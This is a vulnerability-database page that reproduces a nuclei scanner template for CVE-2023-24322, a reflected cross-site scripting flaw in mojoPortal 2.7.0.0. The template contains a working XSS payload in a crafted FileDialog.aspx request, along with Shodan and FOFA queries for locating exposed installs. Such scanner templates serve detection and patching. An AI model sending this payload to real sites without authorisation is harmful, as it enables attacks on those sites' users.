Lucene search

K

mojoPortal 2.7.0.0 - Cross-Site Scripting

🗓️ 20 Feb 2023 13:07:20Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

mojoPortal 2.7.0.0 - Cross-Site Scripting vulnerability in FileDialog.asp

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
OSV
CVE-2023-24322
9 Feb 202320:15
osv
Prion
Cross site scripting
9 Feb 202320:15
prion
CVE
CVE-2023-24322
9 Feb 202320:15
cve
Cvelist
CVE-2023-24322
9 Feb 202300:00
cvelist
NVD
CVE-2023-24322
9 Feb 202320:15
nvd
id: CVE-2023-24322

info:
  name: mojoPortal 2.7.0.0 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.
  remediation: |
    Upgrade to a patched version of mojoPortal or apply the necessary security patches to mitigate the XSS vulnerability.
  reference:
    - https://github.com/blakduk/Advisories/blob/main/Mojoportal/README.md
    - https://github.com/i7MEDIA/mojoportal/
    - https://www.mojoportal.com/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-24322
    - https://github.com/blakduk/Advisories
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-24322
    cwe-id: CWE-79
    epss-score: 0.00157
    epss-percentile: 0.52131
    cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mojoportal
    product: mojoportal
    shodan-query:
      - html:"mojoPortal"
      - http.html:"mojoportal"
    fofa-query: body="mojoportal"
  tags: cve,cve2023,cves,mojoportal,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "javascript:alert('document.domain')"
          - "File Browser"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207ae8ebe1acfc88d1feb7e309352d693e40ad3d9195ac0ec6c16243a2426da2b2022100dd5ebdc1975ca15c1e9726d8d5e8f63441ceb4a26fb997ee657f4f9058e77a1f:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
20 Feb 2023 13:20Current
6Medium risk
Vulners AI Score6
CVSS36.1
EPSS0.00238
31
.json
Report